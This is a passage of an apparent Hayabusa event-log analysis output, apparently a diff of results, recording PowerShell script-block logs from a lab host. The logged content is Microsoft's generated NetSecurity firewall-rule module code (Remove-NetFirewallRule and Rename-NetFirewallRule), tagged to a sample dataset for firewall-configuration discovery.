[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 